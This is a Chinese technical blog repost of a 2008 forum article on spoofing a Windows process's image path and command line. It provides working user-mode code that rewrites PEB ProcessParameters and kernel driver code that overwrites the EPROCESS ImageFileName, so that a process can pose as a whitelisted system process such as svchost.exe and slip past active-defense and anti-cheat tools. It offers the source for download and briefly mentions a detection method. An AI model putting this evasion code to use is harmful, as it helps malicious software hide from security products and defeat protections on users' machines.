S.l.e!ep.¢%

像打了激速一样,以四倍的速度运转,开心的工作
简单、开放、平等的公司文化;尊重个性、自由与个人价值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理
【原创】运行期修改可执行文件的路径和Command Line
NetRoc 当前离线 添加 NetRoc 的声望 反映此帖

标 题: 【原创】运行期修改可执行文件的路径和Command Line
作 者: NetRoc
时 间: 2008-01-04,17:56
链 接: http://bbs.pediy.com/showthread.php?t=57682

cc682/NetRoc
      目前的很多主动防御工具和反XX系统,在对特定进程进行保护的时候,出于兼容性的考虑,都会保留一些白名单。特别是一些系统进程,例如csrss.exe、svchost.exe等等。而针对这些系统进程,判断是否在白名单中的方式,为了简便起见经常采用取系统路径、可执行文件名的方式。
    内核中比较明显的能够取到可执行文件路径的方法有下面几个:
1、  通过PEB. ProcessParameters -> ImagePathName取得可执行文件路径,通过PEB. ProcessParameters -> CommandLine取得执行的命令行,以及PEB. ProcessParameters里面其他几个成员取得其他一些相关的路径信息。
2、  通过nt!_EPROCESS的ImageFileName取得。
3、  通过nt!_EPROCESS:: SeAuditProcessCreationInfo:: ImageFileName取得。
4、  通过和_EPROCESS相关的文件对象信息取得。
    常见的方式一般只有1、2两种。而上述的前三种方式都可以在运行时被修改掉,用来进行欺骗。特别是PEB里面的信息由于在ring3直接就可以访问,实现上来说非常简单。
    下面这段代码通过NtQueryInformationProcess拿到PEB,然后修改路径信息:
HMODULE hMod = GetModuleHandle( _T( "ntdll.dll"));
  pfnNtQueryInformationProcess p = (pfnNtQueryInformationProcess)::GetProcAddress( hMod, "NtQueryInformationProcess");
  
  PROCESS_BASIC_INFORMATION stInfo = {0};
  DWORD dwRetnLen = 0;
  DWORD dw = p( GetCurrentProcess(), ProcessBasicInformation, &stInfo, sizeof(stInfo), &dwRetnLen);
  
  PPEB pPeb = stInfo.PebBaseAddress;

  WCHAR wszFullPath[MAX_PATH] = {0};
  WCHAR wszTmp2[MAX_PATH] = {0};
  wcscpy( wszFullPath, wszPath);
  MultiByteToWideChar( CP_THREAD_ACP, 0, szName, -1, wszTmp2, MAX_PATH);
  wcscat( wszFullPath, wszTmp2);
  
  wcscpy( pPeb->ProcessParameters->ImagePathName.Buffer, wszFullPath);
  pPeb->ProcessParameters->ImagePathName.Length = wcslen( wszFullPath) * sizeof(WCHAR);
  
  int nParamStart = 0;
  WCHAR *wszTmp = new WCHAR[pPeb->ProcessParameters->CommandLine.MaximumLength];
  ZeroMemory( wszTmp, sizeof(WCHAR) * pPeb->ProcessParameters->CommandLine.MaximumLength);
  
  wcscpy( wszTmp, pPeb->ProcessParameters->CommandLine.Buffer);
  
  if ( pPeb->ProcessParameters->CommandLine.Buffer[0] == '"')
  {
    for ( int i = 1; i < pPeb->ProcessParameters->CommandLine.Length / 2; i++)
    {
      if ( pPeb->ProcessParameters->CommandLine.Buffer[i] == '"')
      {
        nParamStart = i;
      }
    }
  }
  
  if ( nParamStart != 0)
  {
    if ( pPeb->ProcessParameters->CommandLine.Buffer[0] == '"')
    {
      pPeb->ProcessParameters->CommandLine.Buffer[0] = NULL;
      wcscat( pPeb->ProcessParameters->CommandLine.Buffer, L"\"");
    }
    else
    {
      pPeb->ProcessParameters->CommandLine.Buffer[0] = NULL;
    }
    wcscat( pPeb->ProcessParameters->CommandLine.Buffer, wszFullPath);
    wcscat( pPeb->ProcessParameters->CommandLine.Buffer, wszTmp + nParamStart);
  }
  delete[] wszTmp;
    这个方式可以欺骗通过toolhelp函数枚举出来的模块路径,以及直接读取PEB获取进程主模块路径的方式。
    另外,通过修改EPROCESS中的主模块名信息,可以欺骗一些在驱动层的程序。基本的代码如下:
    首先需要获取EPROCESS里面ImageFileName的偏移。这个函数必须在DriverEntry里面调用。
ULONG GetNameOffsetInEProcss()
{
  PEPROCESS pProcess = NULL;
  ULONG i = 0;

  pProcess = PsGetCurrentProcess();
  for ( i = 0; i < 0x1000; i++)
  {
    if ( strncmp( "System", (PUCHAR)pProcess + i, strlen("System")) == 0)
    {
      return i;
    }
  }
  return 0;
}
    然后可以在IoCtrl里面修改当前进程的名字:
case IOCTL_CHANGE_EXENAME:
      szName = (char*)Irp->AssociatedIrp.SystemBuffer;
      if ( !szName)
      {
        ntStatus = STATUS_UNSUCCESSFUL;
        break;
      }
      pEProcess = PsGetCurrentProcess();
      strncpy( (PCHAR)pEProcess + g_NameOffsetInEProcess, szName, 16);
      ntStatus = STATUS_SUCCESS;
      break;
    由于只是示例,所以只实现了良种方式。修改SeAuditProcessCreationInfo里面的信息,考虑到兼容性问题,可能稍微复杂一点。不过也可以比较容易的实现。
    这种方式的伪装可以穿过多少主动防御工具没有试过,大家可以去看看,哈哈。
    至于对付的方式,可以通过上面说的第四种取进程路径的方法。不过就比较复杂了,呵呵。
    流程就是,通过EPROCESS的SectionObject获得文件的FilePointer,通过ObQueryNameString取得这个对象的名字。然后就可以取得主映像模块的路径了。详细的代码可以参考wrk中NtQueryInformationProcess的相关实现。
下面是实现的代码: 
ImgPathChanger.rar[谁下载?]

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理